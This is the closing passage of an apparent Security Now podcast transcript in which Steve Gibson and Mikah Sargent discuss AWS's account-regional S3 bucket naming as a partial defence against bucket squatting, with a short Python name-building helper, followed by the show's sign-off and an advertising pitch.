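    example, 'ourbucket-123456789012-us-east-1-an'. Rejects names
    that would exceed S3's 63-character overall limit."""
    name = f"{prefix}-{account_id}-{region}-an"
    if len(name) > 63:
        raise ValueError(f"bucket name too long ({len(name)} > 63 chars)")
    return name

print(account_regional_bucket_name("ourbucket", "123456789012", "us-east-1"))
# ourbucket-123456789012-us-east-1-an
```

Note the practical squeeze Steve points out next: since the suffix eats a fixed chunk of the 63 characters, the usable prefix gets quite short.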

Steve Gibson [02:38:59]:
Okay, so I would argue that the implementation of this is something of a kludge. The total length of the bucket name prefix plus the regional account suffix is limited to 63 characters. So they've really only done two things. First, any bucket created while this new policy is enabled must end in the proper account number regional suffix. Second, that account number regional suffix is now reserved for employees using that account number, so no one else can create a bucket which uses that suffix. And I guess a third thing they've done is they've allowed you to set policies— you know, upper management, the IT overlords can set policies that require all new buckets created to use this account regional namespace suffix. So they finally addressed this problem. Notice that it is incumbent on the organization to turn this on, right? This doesn't do anything retrospectively, retroactively.

Steve Gibson [02:40:23]:
All of that is still a problem. That is, non-regional suffix buckets presumably still exist and work; only newly created ones are covered. So this is just enforcing a new bucket creation naming policy on future bucket creation. So unless Amazon also decides to prohibit the recycling of previous bucket names, and they ought to just take— they ought to immediately, you know, blacklist any that have been abandoned right now, they're still doing nothing to prevent bucket squatting on earlier buckets, which these guys may not have found. They had to do some sort of brute force scanning to find all of these buckets. There are probably other buckets that still exist that have not been found. So, you know, the good news is if organizations adopt and enable this enforced account number regional suffix bucket naming, then at least going forward, the problem will have been prevented.

Steve Gibson [02:41:32]:
And that is bucket squatting.

Mikah Sargent [02:41:37]:
That is far more terrifying than I thought it was going to be based on the name. I will say that. That's, um, pretty prevalent across the web. And the fact that they're frightening—

Steve Gibson [02:41:50]:
how, yeah, how widespread this is.

Mikah Sargent [02:41:53]:
There's a, there's a level of creativity among security researchers that I really find to be quite incredible. When sometimes you'll be talking about these different exploits and ideas, and I think about the thinking required to get to that end point, right? And it's, you know, despite being on its face a more practical, more sort of scientific approach, there's a lot of creativity that's involved in the work that you all do. And I think that that's something that really stands out to me at these times because I just, yeah, you have to think about the different tools that we use that are out there and then go, as you like to say, what could possibly go wrong? And that list can be hundreds of thousands of things, and you just highlight the one. Oh yeah, let's check this. Let's see if that works. This is just a cool thing to think of, but it's a terrifying outcome whenever it comes out to be true, right?

Steve Gibson [02:42:58]:
Yeah, yeah, we're, we're still— on one hand, I think we're dragging legacy design and policy forward. And it's also the case that, I mean, AWS was created after the internet was mature, you know, as a cloud-based service. Yet these guys didn't stop to think, well, what if somebody uses automated agents to pull code from buckets— like firewalls or SSL VPN appliances that are checking for new firmware— and then they go out of business, or they decide, we don't like this bucket, we're going to move that in-house. But there's all this equipment out there that is still pulling from a bucket which has been abandoned, but some bad guy could then register it and provide their own download for all this equipment to download. I mean, this is a, this is a real problem.

Mikah Sargent [02:44:03]:
Yeah, they actually proved it to be a real problem. Yes, that's, that's terrifying. I'm glad that it's, you know, again, we're shining a light on it.

Steve Gibson [02:44:13]:
That's the first step. And it's the good guys who are finding it and not the bad guys because it could be exploited. Unfortunately, there appear to be no, no lack of problems that the bad guys are finding and exploiting too.

Mikah Sargent [02:44:25]:
There are always so many things on that list that we talked about earlier. So Steve, I'm glad that you have your eye on the prize and that others out there are paying attention as well. Uh, this has been Security Now. The show publishes every Tuesday. twit.tv/sn is where you go to find the show. Heading there gives you access to the audio and video versions of the show. You can, of course, check out grc.com where you will find all sorts of good things. It's also where you can go to make sure that you are part of the email subscriptions and to send Steve email as well.

Mikah Sargent [02:45:15]:
And of course, it's the place where you can go to get SpinRite, Steve's bread and butter, plus the DNS Benchmark.

Steve Gibson [02:45:24]:
That's available now, right? Yeah, yeah, it has been for months. Yep, the DNS Benchmark is now available.

Mikah Sargent [02:45:31]:
Wonderful, wonderful. Uh, Steve, thank you so much for another great episode. If I'm forgetting anything, now's your time to tell us. I think you got it. Oh, wonderful. Wonderful.

Steve Gibson [02:45:43]:
Thanks for doing a great job at your end.

Mikah Sargent [02:45:46]:
Thank you. Yeah, it's always a pleasure to get to join you on the show. Leo will be back next week, everyone. Don't worry. Um, but thank you.

Steve Gibson [02:45:53]:
He does, he does have some travel planned for later this year, so we're going to be seeing more of you. Yes, indeed.

Mikah Sargent [02:45:58]:
And I'll be right here ready for it. All right, I think that does it for this week. So goodbye, Steve, and goodbye, listeners. Thanks, buddy. Bye. Thank you very much. Hey, I'm Micah Sargent, host of Tech News Weekly and several other shows on the network. If you're looking for a smarter way to advertise in 2026, look no further, because TWiT is where tech decision makers listen and ROI never ends.

Mikah Sargent [02:46:26]:
Our audience isn't just passionate about technology either. They actually work in it. Over 90% of our listeners are IT professionals, developers, engineers, and business leaders who shape the products and the decisions that move tech forward at their companies. Here at TWiT, we produce an array of trusted tech shows. These include the latest news and hands-on advice featuring authentic, embedded, host-read ads delivered by Leo Laporte and yours truly. Now, our partners see real results because our listeners actually trust us and then take action. And that's because of authenticity. When I'm talking about how I like a product or a service, it's because I actually do.

Mikah Sargent [02:47:09]:
And our listeners know that. And here's something we're super proud of. 88% of our listeners say they've made a purchase because of a TWiT ad. So if you're ready to reach the most intelligent audience in tech with the purchasing power to back it up, let's talk. We'd love to help your brand grow. Email partner@twit.tv or visit twit.tv/advertise. Security Now.
